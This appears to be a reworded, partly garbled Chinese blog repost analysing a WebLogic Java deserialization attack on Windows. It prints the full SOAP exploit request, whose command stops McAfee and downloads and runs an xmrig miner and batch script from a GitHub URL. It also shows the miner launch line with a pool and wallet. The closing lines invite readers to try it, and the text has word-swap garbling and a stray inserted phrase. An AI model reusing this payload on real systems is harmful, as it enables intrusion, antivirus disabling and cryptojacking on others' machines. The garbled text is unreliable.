快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

行使Java反序列化漏洞在Windows上的挖矿实验

a.png

近来,安全社区中有很多人都在讨论怎么样行使Java反序列化漏洞来攻击类似Apache、SOLR以及WebLogic之类的体系。不说废话,我们直接进入正题。目前尽大多数的此类攻击针对的都是Linux/Unix体系,然则我近期发现了一种针对Windows体系的攻击要领。

PS:本文仅用于手艺讨论与分享,严禁用于非法用途

攻击代码以下:

<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <objectclass="java.lang.ProcessBuilder">
          <arrayclass="java.lang.String" length="3" >
            <void index="0">
              <string>cmd</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;</string>
            </void>
          </array>
          <voidmethod="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>


实际的Payload阐发

关闭McAfee反病毒软件(我不明白社区中的这类手艺为啥只关掉McAfee…):

netstop "McAfee McShield;
netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序以及一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";
bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;
dirxmrig*;
xmrig.bat;
tasklist;

Batch脚本文件代码以下:

taskkill/im /f xmrig.exe /t
netstop "McAfee McShield"
netstop mcafeeframework
xmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

起首,上述代码会停止其他xmrig进程(多是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,数据库黑客,并跟monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了不被检测到吧。

目前为止,这个挖矿程序的计算能力只能完成350哈希每一秒,并为我挖到了40个门罗币(价值约为7000美元)。

感兴致的同砚可以本人下手试一试,说不定会有一些意想不到的收获。

* 参考来源:sans,Alpha_pck编译,

您可能还会对下面的文章感兴趣: